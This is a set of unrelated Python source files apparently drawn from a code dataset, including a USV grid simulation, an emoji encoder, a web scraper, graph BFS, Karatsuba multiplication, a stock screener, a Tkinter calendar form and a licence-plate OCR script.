'''判断USV决定要去的位置是否合法;在这个基本的函数里,所有舰艇不得走出地图范围,不得走到\r\n 其它舰艇已经占用的位置;友军舰艇不得走到被保护的目标点.'''\r\n width, height = self.env.width, self.env.height\r\n if(decisionX < 0 or decisionY < 0 or decisionX > width - 1 or decisionY > height - 1):\r\n return False\r\n\r\n occupied = False\r\n for ship in self.env.ships:\r\n if(ship.id == self.id):\r\n continue\r\n shipX, shipY = ship.coordinate()\r\n if(shipX == decisionX and shipY == decisionY):\r\n occupied = True\r\n\r\n if(not self.is_enemy):\r\n tX, tY = self.env.target_coordinate()\r\n if(tX == decisionX and tY == decisionY):\r\n occupied = True\r\n\r\n if(occupied):\r\n return False\r\n\r\n return True\r\n\r\n def turn(self, clockwise):\r\n '''这一函数描绘本艘USV在一单位时间内如何改变自身方向,因此其作用是在顺时针或逆时针方向上\r\n 增加当前USV角速度的绝对值(角度变化=角速度*1时间单位=角速度的绝对值)'''\r\n if(clockwise):\r\n self.direction += self.angular_speed\r\n if(self.direction >= 360):\r\n self.direction -= 360\r\n else:\r\n self.direction -= self.angular_speed\r\n if(self.direction < 0):\r\n self.direction += 360\r\n\r\n def coordinate(self):\r\n '''返回本USV的位置'''\r\n return self.x, self.y\r\n\r\n def set_as_enemy(self):\r\n '''将本USV定义为敌方(��攻方)'''\r\n self.is_enemy = True\r\n\r\n def set_as_friendly(self):\r\n '''将本USV定义为友军(防守方)'''\r\n self.is_enemy = False\r\n\r\n\r\nclass BasicPlaneUSV(StaticUSV):\r\n \"\"\"基本平面USV, 这个USV可以在瞬间改变自己的角速度和速度, 转动后在对应方向上走动一帧时间*速度的距离\"\"\"\r\n\r\n def __init__(self, uid, x, y, env):\r\n super(BasicPlaneUSV, self).__init__(uid, x, y, env)\r\n self.action_class = Action = namedtuple(\"action\", ['stay', 'clockwise', 'angular_speed', 'speed'])\r\n\r\n def decision_algorithm(self):\r\n '''这种USV的action对象有四个属性:1.stay,如果设为True,代表USV决定不行动,后面的参数被忽略;\r\n 2.clockwise,转动方向是否是顺时针;3.angular_speed角速度;4.speed速度.\r\n 
如果stay参数为False,USV将会根据clockwise的指示转动angular_speed*t(一帧时间)度,然后前进当前的速度*t的距离'''\r\n Action = self.action_class\r\n example_action = Action(False, False, 20.0, 10.0)\r\n example_action1 = Action(True, False, 0.0, 0.0)\r\n raise Exception(\"请覆盖decision_algorithm方法!\")\r\n\r\n def move(self):\r\n action = self.decision_algorithm()\r\n if(not action.stay):\r\n self.update_direction(action)\r\n self.update_speed(action)\r\n self.update_coordinate()\r\n\r\n def update_direction(self, action):\r\n self.angular_speed = action.angular_speed\r\n self.turn(action.clockwise)\r\n\r\n def update_speed(self, action):\r\n self.speed = action.speed\r\n\r\n def update_coordinate(self):\r\n self.x -= cos(pi * self.direction / 180) * self.speed\r\n self.y += sin(pi * self.direction / 180) * self.speed\r\n\r\n\r\n\r\nclass OneStepUSV(BasicPlaneUSV):\r\n \"\"\"一个简单的USV类,在网格上它一次只能走动一步.每一时间单位,这种USV能够瞬时的改变自己的角速度,然后转动,最后向\r\n 转动后的方向上移动一格.\"\"\"\r\n\r\n def __init__(self, uid, x, y, env):\r\n super(OneStepUSV, self).__init__(uid, x, y, env)\r\n self.action_class = namedtuple(\"action\", ['stay', 'clockwise', 'angular_speed'])\r\n self.speed = 1\r\n\r\n def decision_algorithm(self):\r\n '''这种USV的action字典有三个参数:1.stay,如果设为True,代表USV决定不行动,后面的参数被忽略;\r\n 2.clockwise,转动方向是否是顺时针;3.angular_speed角速度.\r\n 如果stay参数为False,USV将会根据clockwise的指示转动angular_speed度,然后前进一步.注意由于\r\n 此模型下angular_speed只能为90的倍数'''\r\n Action = self.action_class\r\n example_action = Action(False, False, 20.0)\r\n example_action1 = Action(True, False, 0.0)\r\n raise Exception(\"请覆盖decision_algorithm方法!\")\r\n\r\n def move(self):\r\n action = self.decision_algorithm()\r\n if(not action.stay):\r\n self.update_direction(action)\r\n self.update_coordinate()\r\n\r\n def update_coordinate(self):\r\n if(self.direction == 0.0):\r\n self.x -= self.speed\r\n elif(self.direction == 90.0):\r\n self.y += self.speed\r\n elif(self.direction == 180.0):\r\n self.x += self.speed\r\n elif(self.direction == 270.0):\r\n self.y -= self.speed\r\n else:\r\n raise Exception(\r\n \"OneStepUSV的direction属性应该是正交角度,然而,得到了 %f 度\" % self.direction)\r\n # print \"我是%d号船,我现在走到了(%f,%f)\"%(self.id,self.x,self.y)","sub_path":"usv.py","file_name":"usv.py","file_ext":"py","file_size_in_byte":6210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"200173039","text":"import base64\nimport hashlib\nimport hmac\nimport zlib\n\nimport cryptography.fernet\n\n\nclass Emncojider(object):\n _digits = (\n '0123456789abcdef!?~=-%#ʘ/ΣĐ&Λ*Ψµᢵᣦᣌ'\n '😀😁😂😃😄😅😆😇😈😉😊😋😌😍😎😏'\n '😐😑😒😓😔😕😖😗😘😙😚😛😜😝😞😟'\n '😠😡😢😣😤😥😦😧😨😩😪😫😬😭😮😯'\n '😰😱😲😳😴😵😶😷😸😹😺😻😼😽😾😿'\n '🙀🙁🙂🙃🙄🙅🙆🙇🙈🙉🙊🙋🙌🙍🙎🙏'\n '🤐🤑🤒🤓🤔🤕🤖🤗🤘🤙🤚🤛🤜🤝🤞🤠'\n '🤡🤢🤣🤤🤥🤦🤧🤳🤴🤵🤶🤷🤸🤹🤺'\n '🤼🤽🤾🥀🥁🥂🥃🥄🥅🥇🥈🥉🥊🥋🥐'\n '🥑🥒🥔🥕🥖🥗🥘🥙🥚🥛🥜🥝🥞🦀🦁'\n '🏃🏄🏇🏊🏋👃👆💆💇💪🕴🕵🕺🖐🏂'\n '🦂🦃🦄🦅🦆🦇🦈🦉🦊🦋🦌🦍🦎🦏🦐🦑'\n '👇👈👉👊👋👌👍👎👏👐👦👧👨👩👮👰'\n '👱👲👳👴👵👶👷👸👼��💂💃💅⛽'\n '÷þ¿±¢$£¥×¡Δχ€‘’Ξᴥᴪᴣ'\n )\n assert 0x100 == len(_digits) == len(set(_digits))\n\n def __init__(self, key=None):\n if key == None:\n self._key = b'\\x00' * 32\n else:\n self._key = bytes(key)\n\n self._fernet = cryptography.fernet.Fernet(base64.urlsafe_b64encode(self._key))\n self._nonrandom_header_length = 9\n\n def encode(self, bs):\n compressed = zlib.compress(bs, level=9)\n safe_bytes = self._fernet.encrypt(compressed)\n fer_bytes = bytearray(base64.urlsafe_b64decode(safe_bytes))\n mask = hmac.new(self._key, fer_bytes[self._nonrandom_header_length:], hashlib.sha256).digest()\n for i in range(self._nonrandom_header_length):\n fer_bytes[i] ^= mask[i]\n return ''.join(self._digits[b] for b in fer_bytes)\n\n def decode(self, s):\n fer_bytes = 
bytearray(self._digits.index(c) for c in s)\n        mask = hmac.new(self._key, fer_bytes[self._nonrandom_header_length:], hashlib.sha256).digest()\n        for i in range(self._nonrandom_header_length):\n            fer_bytes[i] ^= mask[i]\n        safe_bytes = base64.urlsafe_b64encode(fer_bytes)\n        compressed = self._fernet.decrypt(safe_bytes)\n        return zlib.decompress(compressed)\n\n\nencode = Emncojider().encode\ndecode = Emncojider().decode\n","sub_path":"stackchat/_util/emncojiding.py","file_name":"emncojiding.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"427994654","text":"from urllib.request import Request, urlopen\n\nfrom bs4 import BeautifulSoup\n\nfrom collection import crawler\n\n\ndef ex01():\n    request = Request(\"https://movie.naver.com/movie/sdb/rank/rmovie.nhn\")\n    response = urlopen(request)\n    html = response.read().decode('cp949')\n    # print(html)\n\n    bs = BeautifulSoup(html, 'html.parser')\n    divs = bs.findAll('div',attrs={'class':'tit3'})\n    # print(len(divs))\n    for index,div in enumerate(divs):\n        print(index+1,div.a.text,div.a['href'],sep=':')\n\n\ndef print_error(e):\n    print(e)\n\n\ndef ex02():\n    html = crawler.crawling(url='https://movie.naver.com/movie/sdb/rank/rmovie.nhn',\n                            encoding='cp949')\n    # print(html)\n\n    bs = BeautifulSoup(html, 'html.parser')\n    divs = bs.findAll('div',attrs={'class':'tit3'})\n    # print(len(divs))\n    for index,div in enumerate(divs):\n        print(index+1,div.a.text,div.a['href'],sep=':')\n\n\n\nif __name__=='__main__':\n    # ex01()\n    ex02()","sub_path":"test/test_naver_movie_rank.py","file_name":"test_naver_movie_rank.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"438425784","text":"__author__ = 'zhy'\n\n\nclass Solution(object):\n    def reverseWords(self, s):\n        \"\"\"\n        :type s: str\n        :rtype: str\n        \"\"\"\n        if s is None or len(s) == 0 or len(s.split()) == 0:\n            return \"\"\n        res = \"\"\n        words = s.split()\n        for word in range(0, len(words)):\n            if word == len(words) - 1:\n                res += words[-1 - word]\n            else:\n                res += words[-1 - word] + ' '\n        return res\n\n\ndef test():\n    solu = Solution()\n    s = \"hoe\"\n    print(solu.reverseWords(s))\n\n\nif __name__ == '__main__':\n    test()\n","sub_path":"ReverseWords.py","file_name":"ReverseWords.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"18129878","text":"import datetime\nfrom olive.finance import database,tools,spider\n\n\n#连接数据库\nmydb=database.oliveMongoDB()\n\n#定义起始时间\nstart_date=datetime.datetime(2010,1,1)\nend_date=datetime.datetime.today()\n\n\n_all_money=25000;\n_rate=0.01\n_nday=20\n_shortday=20\n_longday=55\n\n\n#stock_list=spider.changeChinaStockCodeToYahoo(mydb.getData('stocklist',{'country':'China' },'code'))\n#stock_list=spider.changeChinaStockCodeToYahoo(mydb.getData('stocklist',{'code':'AMZN' },'code'))\n#stock_list=mydb.getData('stocklist',{'code':'AMZN' },'code')\nstock_list=mydb.getData('stocklist',{'country':'US' },'code')\n#print(stock_list)\n_list=[]\nfor stock in stock_list:\n\n\t#monogodb的查询语法\n\tdata_list=mydb.getData('stockday',{\"code\":stock['code'],\"Date\": {\"$gte\": start_date,\"$lte\":end_date}},'Date')\n\n\tif len(data_list)== 0:\n\t\tprint(\"Data record is Empty!\")\n\t\tcontinue;\n\telse:\n\t\tprint(\"Record Num : 
\"+str(len(data_list)))\n\n\tprint('#'*80)\n\tlast_price=float(data_list[-1]['Close'])\n\tlast_high_price=float(data_list[-1]['High'])\n\tlast_low_price=float(data_list[-1]['Low'])\n\n\tN=tools.ATR(tools.TR(data_list),_nday)[-1]\n\tif N==0:\n\t\tposition=_all_money/last_price\n\telse:\n\t\tposition=_all_money*_rate/N\n\n\tprint(\"Code:{0} Start:{1} End:{2}\".format(stock['code'],start_date.strftime('%Y-%m-%d'),end_date.strftime('%Y-%m-%d')))\n\tprint(\"ART:{:.4f}\".format(N))\n\tprint(\"Max Position Sizing:{0}\".format(int(position)))\n\t\n\n\tprint(\"Date:{0}\".format(data_list[-1]['Date'].strftime('%Y-%m-%d')))\n\tprint(\"Price:{0}\".format(last_price))\n\tprint(\"Stop Price:{:.2f}\".format(last_price-2*N))\n\n\thighlowpriceshort=tools.getLastHighAndLowPrice(data_list,_shortday)\n\thighlowpricelong=tools.getLastHighAndLowPrice(data_list,_longday)\n\tcrossshort=max(last_price,last_high_price)==highlowpriceshort[0] or min(last_price,last_low_price)==highlowpriceshort[1]\n\tcrosslong=max(last_price,last_high_price)==highlowpricelong[0] or min(last_price,last_low_price)==highlowpricelong[1]\n\n\tprint(\"20dH:{0} 20dL:{1} Cross:{2}\".format(highlowpriceshort[0],highlowpriceshort[1],crossshort))\n\tprint(\"55dH:{0} 55dL:{1} Cross:{2}\".format(highlowpricelong[0],highlowpricelong[1],crosslong))\n\n\tif crossshort or crosslong:\n\t\t_list.append(stock['code'])\n\nprint('#'*80)\nprint(_list)\nprint(\"All Stock Number:{0}\".format(len(stock_list)))\nprint(\"Seaturtle Number:{0}\".format(len(_list)))\nmydb.close()","sub_path":"Seaturtle.py","file_name":"Seaturtle.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"110451302","text":"import networkx as nx\nimport matplotlib.pyplot as plt \n\nclass Queue:\n def __init__(self):\n self.q = []\n\n def enqueue(self,obj): #dodanie elementu do kolejki\n self.q.append(obj)\n\n def dequeue(self): #zdjęcie i zwrócenie elementu z kolejki\n if len(self.q)>0:\n return self.q.pop(0)\n else:\n return None\n\n def empty(self): #zwraca True gdy kolejka pusta\n if len(self.q)>0:\n return False\n else:\n return True\n\ndef BFS(lista_sas,odwiedzone,start,krotki):\n kolejka = Queue()\n kolejka.enqueue(start)\n odwiedzone[start] = True\n print(start)\n\n while not kolejka.empty():\n wierzch = kolejka.dequeue()\n sasiedzi = lista_sas[wierzch]\n\n for x in sasiedzi:\n if not odwiedzone[x]:\n krotki.append((wierzch, x)) ###\n odwiedzone[x] = True\n kolejka.enqueue(x)\n print(x)\n return krotki ###\n\nlista_sas = [[2, 4], [3, 4, 5, 6, 8],\n [0, 8], [1, 6, 8], [0, 1],\n [1], [1, 3], [8], [1, 2, 3, 7]]\nkrotki = []\nodwiedzone = len(lista_sas) * [False]\nkrotki = BFS(lista_sas, odwiedzone, 0, krotki)\nprint(krotki)\n\nG = nx.Graph()\nnodes = [0,1,2,3,4,5,6,7,8]\nG.add_nodes_from(nodes)\nfor x in krotki:\n G.add_edge(x[0], x[1])\n \nnx.draw(G,with_labels = True)\nplt.savefig(\"simple_path.png\")\nplt.show()\n\n\n\n\n\n\n\n","sub_path":"zadania2/zad2.py","file_name":"zad2.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"10988272","text":"# Karatsuba Algorithm\n# Written by Alondra Pereira\n# Implementation based on video \"1 3 Karatsuba Multiplication 13 min\" by Stanford Algorithms\n# Link -> https://www.youtube.com/watch?v=JCbZayFr9RE\n\nimport random\n\n# Params:\n# x = first integer\n# y = second integer\n# base = base 10\n\ndef karatsuba(x, y, base=10):\n # Base case: If one of 
the two integers has only one digit, multiply them.\n str_x = str(x)\n str_y = str(y)\n if len(str_x) == 1 or len(str_y) == 1:\n return x * y\n else:\n # Sets n to the integer with the most digits.\n n = max(len(str_x), len(str_y))\n half_of_n = n // 2\n a = x // (base ** half_of_n)\n b = x % (base ** half_of_n)\n c = y // (base ** half_of_n)\n d = y % (base ** half_of_n)\n # Recursively computes ac and bd\n ac = karatsuba(a, c)\n bd = karatsuba(b, d)\n # Calculates ad + bc using the Gaussian Trick [(a+b)(c+d) - bd - ac = ad + bc)]\n ad_plus_bc = karatsuba(a + b, c + d) - bd - ac\n # Returns final result using (10ˆn/2)(ac) + (10ˆn/2)(ad + bc) + bd\n return ((base ** (half_of_n*2)) * ac) + ((base ** half_of_n) * ad_plus_bc) + bd\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n for i in range(5):\n x = random.randint(1, 4000)\n print(\"x = \", x)\n y = random.randint(1, 4000)\n print(\"y = \", y)\n res = karatsuba(x, y)\n print(\"Result= \", res)\n assert res == x * y\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"433176396","text":"import math\nimport torch.nn as nn\nimport torch\n\ndef spatial_pyramid_pool(previous_conv, num_sample, previous_conv_size, out_pool_size):\n '''\n previous_conv: a tensor vector of previous convolution layer\n num_sample: an int number of image in the batch\n previous_conv_size: an int vector [height, width] of the matrix features size of previous convolution layer\n out_pool_size: a int vector of expected output size of max pooling layer\n \n returns: a tensor vector with shape [1 x n] is the concentration of multi-level pooling\n ''' \n for i in range(len(out_pool_size)):\n h_wid = math.ceil(previous_conv_size[0] / out_pool_size[i])\n w_wid = math.ceil(previous_conv_size[1] / out_pool_size[i]) # kernel_size(int or tuple) - max pooling的窗口大小\n h_pad = min(math.floor((h_wid*out_pool_size[i] - previous_conv_size[0] + 1)/2),math.floor(h_wid/2))\n w_pad = min(math.floor((w_wid*out_pool_size[i] - previous_conv_size[1] + 1)/2),math.floor(w_wid/2)) # padding(int or tuple, optional) - 输入的每一条边补充0的层数\n # 以上的计算就是为了解决无论取出来的region_proposal大小如何,最终经过maxpool后的大小都是一致的\n maxpool = nn.MaxPool2d((h_wid, w_wid), stride=(h_wid, w_wid), padding=(h_pad, w_pad))\n x = maxpool(previous_conv) # [1, 512, 2, 2]后面两维是out_pool_size\n # print(\"x shape:\", x.shape)\n if x.shape[2] == 1:\n x = torch.cat((x, x), 2)\n elif x.shape[3] == 1:\n x = torch.cat((x, x), 3)\n m = x.view(num_sample,-1)\n if(m.size(1) != 2048):\n continue\n if(i == 0):\n spp = x.view(num_sample,-1)\n # print(\"spp0 size:\",spp.size())\n else:\n spp = torch.cat((spp,x.view(num_sample,-1)), 1)\n # print(\"spp1 size:\", spp.size())\n return spp\n","sub_path":"model/spp_layer.py","file_name":"spp_layer.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"352046331","text":"#12. 
Write a program which accepts a number from user and returns number of digits in that number.\r\n\r\ndef fun(num):\r\n    sum=0\r\n    while (num!=0):\r\n        num=num//10\r\n        sum=sum+1\r\n    print(\"Number of digits :\",sum)\r\n\r\nif __name__ == \"__main__\":\r\n    fun(num=int(input(\"Enter number : \")))\r\n","sub_path":"Python Basics/Assignment12.py","file_name":"Assignment12.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"109124857","text":"# 简单的装饰器,确保函数接受的所有参数都是整形,否则报错\r\n\r\n\r\ndef requires_ints(func):\r\n    def inner(*args,**kwargs):\r\n        # 取得关键字的值\r\n        kwarg_values = [i for i in kwargs.values()]\r\n        print(args) #(3,5)\r\n        print(kwargs.values()) # dict_values([])\r\n        for arg in (list(args) + kwarg_values):\r\n            if not isinstance(arg,int):\r\n                raise TypeError('%s only accepts integers as arguments (只能接受整数).' % func.__name__)\r\n        return func(*args,**kwargs)\r\n    return inner\r\n\r\n\r\n@requires_ints\r\ndef foo(x,y):\r\n    return x+y\r\n\r\n\r\nprint(help(foo)) #inner(*args, **kwargs)\r\n\r\na = foo(3,5)\r\nprint(a) # 8\r\n\r\n\r\nb = foo(3,'haha')\r\nprint(b)\r\n\r\n# raise TypeError('%s only accepts integers as arguments (只能接受整数).' % func.__name__)\r\n# TypeError: foo only accepts integers as arguments (只能接受整数).","sub_path":"装饰器/类型检查.py","file_name":"类型检查.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"195101212","text":"from tkinter import*\nimport tkinter.messagebox as message_box\nfrom tkinter import ttk\nimport sqlite3\n\n\nroot = Tk()\nroot.title(\"Calendar Options Form\")\nscreen_width = root.winfo_screenwidth()\nscreen_height = root.winfo_screenheight()\nwidth = 900\nheight = 500\nx = (screen_width/2) - (width/2)\ny = (screen_height/2) - (height/2)\nroot.geometry('%dx%d+%d+%d' % (width, height, x, y))\nroot.resizable(0, 0)\n\n\n\n# ---- Variables ----\nlistbox_headers = ('RequestID', 'Date', 'Signed Off')\n\n\n# test data\nrequest_id = 1234\nemp_id = 1100\nleave_date = \"13/06/19\"\nsubmission_date = \"03/05/19\"\nleave_type = \"Holiday\"\nemp_comment = \"I am going on holiday\"\nsigned_off = \"No\"\nmgr_comment = \"All employees must attend on this date\"\nmgr_name = \"Steven Tasks\"\ndate_name = \"TestHoliday\"\ndate_to_remove = \"01/02/19\"\n\n# ---- Methods ----\n\n\ndef add_date():\n\n    date_name_to_add = txt_date_name.get(\"1.0\", END)\n    date_to_add = \"DATE\"\n\n    result = message_box.askquestion(\"Add date\", \"Are you sure you want to add bank holiday ''\" + str(date_name_to_add) + \"'' on \" + str(date_to_add) + \"?\", icon='warning')\n\n    if result == 'yes':\n        message_box.showinfo(\"\", str(date_name_to_add) + \" has been successfully added!\")\n        print(\"New holiday ''\" + str(date_name_to_add) + \"'' on \" + str(date_to_add) + \" added by \" + mgr_name)\n    else:\n        print(\"New Holiday Date creation canceled\")\n\n\ndef remove_date():\n    date_name_to_remove = \"DATE_NAME\"\n    date_to_remove = \"DATE\"\n\n    result = message_box.askquestion(\"Remove date\",\n                                     \"Are you sure you want to remove bank holiday ''\" + str(date_name_to_remove) + \"'' on \" + str(date_to_remove) + \"?\",\n                                     icon='warning')\n\n    if result == 'yes':\n        message_box.showinfo(\"\", date_name_to_remove + \" has been successfully removed.\")\n        print(\"''\" + str(date_name_to_remove) + \"'' on \" + str(date_to_remove) + \" removed by \" + mgr_name)\n    else:\n        print(\"Holiday Date deletion canceled\")\n\n\ndef remove_all_bank_holidays():\r\n\r\n    
result = message_box.askquestion(\"Remove All Bank Holidays\", \"Are you sure you want to remove ALL bank holidays from the calendar?\", icon='warning')\n\n if result == 'yes':\n message_box.showinfo(\"\", \"All Bank Holidays Removed\")\n print(\"All Bank Holidays Removed by \" + mgr_name)\n else:\n print(\"All Bank Holiday Removal Canceled\")\n\n\n# ---- Frame ----\n\n\nfraBankHol = Frame(root, width=900, height=150, relief=\"raise\")\nfraBankHol.pack(side=TOP, anchor=N)\n\nfraAddRemove = Frame(root, width=900, height=200, relief=\"raise\")\nfraAddRemove.pack(side=TOP, anchor=N, fill=BOTH)\n\nfraAddDate = Frame(fraAddRemove, width=350, height=200, bd=6, relief=\"raise\")\nfraAddDate.pack(side=LEFT, anchor=CENTER)\n\nfraAddDate.grid_rowconfigure(0, weight=0)\nfraAddDate.grid_columnconfigure(0, weight=0)\n\nfraRemoveDate = Frame(fraAddRemove, width=350, height=200, bd=6, relief=\"raise\")\nfraRemoveDate.pack(side=RIGHT, anchor=CENTER)\n\nfraRemoveDate.grid_rowconfigure(0, weight=0)\nfraRemoveDate.grid_columnconfigure(0, weight=0)\n\nfraAnualRollover = Frame(root, width=900, height=150, relief=\"raise\")\nfraAnualRollover.pack(side=TOP, anchor=N)\n\nfraAnualRollover.grid_rowconfigure(0, weight=0)\nfraAnualRollover.grid_columnconfigure(0, weight=0)\n\n\n# ---- Labels ---- #\n\nlbl_bankhol = Label(fraBankHol, justify=LEFT, anchor=W, width=100, font=('Arial', 20), text=\"Bank Holiday Date Options\")\nlbl_bankhol.pack()\n\nlbl_add_date = Label(fraAddDate, justify=LEFT, anchor=W, width=10, font=('Arial', 15), text=\"Add Date\")\nlbl_add_date.grid(column=0, row=0)\n\nlbl_adddate_date = Label(fraAddDate, justify=LEFT, anchor=W, width=5, font=('Arial', 18), text=\"Date:\")\nlbl_adddate_date.grid(column=0, row=1)\n\nlbl_adddate_name = Label(fraAddDate, justify=LEFT, anchor=W, width=5, font=('Arial', 18), text=\"Name:\")\nlbl_adddate_name.grid(column=0, row=2)\n\nlbl_remove_date = Label(fraRemoveDate, justify=LEFT, anchor=W, width=15, font=('Arial', 15), text=\"Remove Date\")\nlbl_remove_date.grid(column=0, row=0)\n\nlbl_removedate_date = Label(fraRemoveDate, justify=LEFT, anchor=W, width=5, font=('Arial', 18), text=\"Date:\")\nlbl_removedate_date.grid(column=0, row=1)\n\nlbl_removedate_name = Label(fraRemoveDate, justify=LEFT, anchor=W, width=5, font=('Arial', 18), text=\"Name:\")\nlbl_removedate_name.grid(column=0, row=2)\n\nlbl_removedate_name_actual = Label(fraRemoveDate, justify=LEFT, anchor=W, width=20, font=('Arial', 18), text=date_name)\nlbl_removedate_name_actual.grid(column=1, row=2)\n\nlbl_anual_rollover = Label(fraAnualRollover, justify=LEFT, anchor=W, width=60, font=('Arial', 20), text=\"Anual Rollover Options\")\nlbl_anual_rollover.grid(column=0, row=0, columnspan=20)\n\nlbl_num_days = Label(fraAnualRollover, justify=LEFT, anchor=W, width=40, font=('Arial', 16), text=\"Number of leave days to roll over to the next year:\")\nlbl_num_days.grid(column=0, row=1)\n\nufix_logo = PhotoImage(file=\"UfixLogo.png\")\npic_ufix_logo = Label(fraAnualRollover, anchor=S, justify=RIGHT, image=ufix_logo)\n\npic_ufix_logo.grid(row=0, column=5, rowspan=2)\n\n# ---- Checkboxes ---- #\nchk_online_dates = Checkbutton(fraBankHol, font=('Arial', 16), text=\"Automatically get Bank Holiday dates from the internet\")\nchk_online_dates.pack(anchor=W)\n\n# ---- Spinbox ---- #\nspn_num_days = ttk.Spinbox(fraAnualRollover, from_=0, to=30)\nspn_num_days.grid(column=1, row=1)\n\n# --- Comboboxes ---- #\n\ncmb_date_picker = ttk.Combobox(fraAddDate, width=20, font=('Arial', 18))\ncmb_date_picker['values'] = 
\"peekaboo\"\ncmb_date_picker.grid(row=1, column=1)\n\ncmb_remove_date = ttk.Combobox(fraRemoveDate, width=20, font=('Arial', 18))\ncmb_remove_date['values'] = \"peekaboo\"\ncmb_remove_date.grid(row=1, column=1)\n\n# ---- TextBox ---- #\n\ntxt_date_name = Text(fraAddDate, width=20, height=1, font=('Arial', 18))\ntxt_date_name.grid(row=2, column=1, rowspan=2, pady=1)\n\n# ---- Buttons ---- #\n\nbtn_removeAllBankHol = Button(fraBankHol, width=23, font=('Arial', 18), text=\"Remove All Bank Holiday Dates\", padx=20, command=remove_all_bank_holidays)\nbtn_removeAllBankHol.pack()\n\nbtn_addDate = Button(fraAddDate, width=10, font=('Arial', 18), text=\"Add\", padx=20, command=add_date)\nbtn_addDate.grid(row=5, column=1)\n\nbtn_removeDate = Button(fraRemoveDate, width=10, font=('Arial', 18), text=\"Delete\", padx=20, command=remove_date)\nbtn_removeDate.grid(row=5, column=1)\n\n\n# ---- Initialization ---- #\n\n# Works like Form.Load in C#\nif __name__ == '__main__':\n\n root.mainloop()\n","sub_path":"CalendarOptionsForm.py","file_name":"CalendarOptionsForm.py","file_ext":"py","file_size_in_byte":6430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"269717418","text":"# This file is part of the OpenProtein project.\n#\n# @author Jeppe Hallgren\n#\n# For license information, please see the LICENSE file in the root directory.\nfrom util import *\nimport time\nimport torch.nn.utils.rnn as rnn_utils\nimport torch.nn as nn\n\nclass BaseModel(nn.Module):\n def __init__(self, use_gpu, embedding_size):\n super(BaseModel, self).__init__()\n\n # initialize model variables\n self.use_gpu = use_gpu\n self.embedding_size = embedding_size\n\n def get_embedding_size(self):\n return self.embedding_size\n\n def embed(self, original_aa_string):\n data, batch_sizes = torch.nn.utils.rnn.pad_packed_sequence(\n torch.nn.utils.rnn.pack_sequence(original_aa_string))\n\n # one-hot encoding\n start_compute_embed = time.time()\n prot_aa_list = data.unsqueeze(1)\n embed_tensor = torch.zeros(prot_aa_list.size(0), 21, prot_aa_list.size(2)) # 21 classes\n if self.use_gpu:\n prot_aa_list = prot_aa_list.cuda()\n embed_tensor = embed_tensor.cuda()\n input_sequences = embed_tensor.scatter_(1, prot_aa_list.data, 1).transpose(1,2)\n end = time.time()\n write_out(\"Embed time:\", end - start_compute_embed)\n packed_input_sequences = rnn_utils.pack_padded_sequence(input_sequences, batch_sizes)\n return packed_input_sequences\n\n def forward(self, original_aa_string):\n return self._get_network_emissions(original_aa_string)","sub_path":"openprotein.py","file_name":"openprotein.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"440727555","text":"import cv2\r\nimport imutils #for resizing images\r\nimport pytesseract\r\n\r\npytesseract.pytesseract.tesseract_cmd = r\"C:\\Program Files (x86)\\Tesseract-OCR\\tesseract\"\r\n\r\nimage=cv2.imread('b.jpg') #reading the image file\r\nimage=imutils.resize(image, width=500\r\n )\r\n\r\ncv2.imshow(\"Original Image\",image)\r\n\r\n\r\ngray=cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\r\ncv2.imshow(\"Gray Scale Image\",gray)\r\n\r\n\r\ngray=cv2.bilateralFilter(gray,11,17,17)\r\ncv2.imshow(\"Smoother Image\",gray)\r\n\r\n\r\nedged=cv2.Canny(gray,170,200)\r\ncv2.imshow(\"Canny edge\",edged)\r\n\r\n\r\ncnts,new = 
cv2.findContours(edged.copy(),cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)\r\nimage1=image.copy()\r\ncv2.drawContours(image1,cnts,-1,(0,255,0),3)\r\ncv2.imshow(\"Canny after contouring\",image1)\r\n\r\n\r\ncnts=sorted(cnts, key=cv2.contourArea, reverse=True)[:50]\r\nNumberPlateCount=None\r\n\r\nimage2= image.copy()\r\ncv2.drawContours(image2,cnts,-1,(0,255,0),3)\r\ncv2.imshow(\"Top 50 contours\",image2)\r\n\r\n\r\ncount = 0\r\nname = 1\r\n\r\nfor i in cnts:\r\n perimeter=cv2.arcLength(i,True)\r\n approx = cv2.approxPolyDP(i,0.02*perimeter,True)\r\n if(len(approx)==4):\r\n NumberPlateCount = approx\r\n x,y,w,h = cv2.boundingRect(i)\r\n crp_img = image[y:y+h, x:x+w]\r\n cv2.imwrite(str(name)+'.png',crp_img)\r\n\r\n name = name + 1\r\n break\r\ncv2.drawContours(image,[NumberPlateCount],-1,(0,255,0),3)\r\ncv2.imshow(\"Final Image\",image)\r\n\r\n\r\ncrop_img_loc=\"1.png\"\r\ncv2.imshow(\"Cropped Image\", cv2.imread(crop_img_loc))\r\ntext=\"\"\r\ntext=pytesseract.image_to_string(crop_img_loc,lang='eng')\r\nprint(\"Number 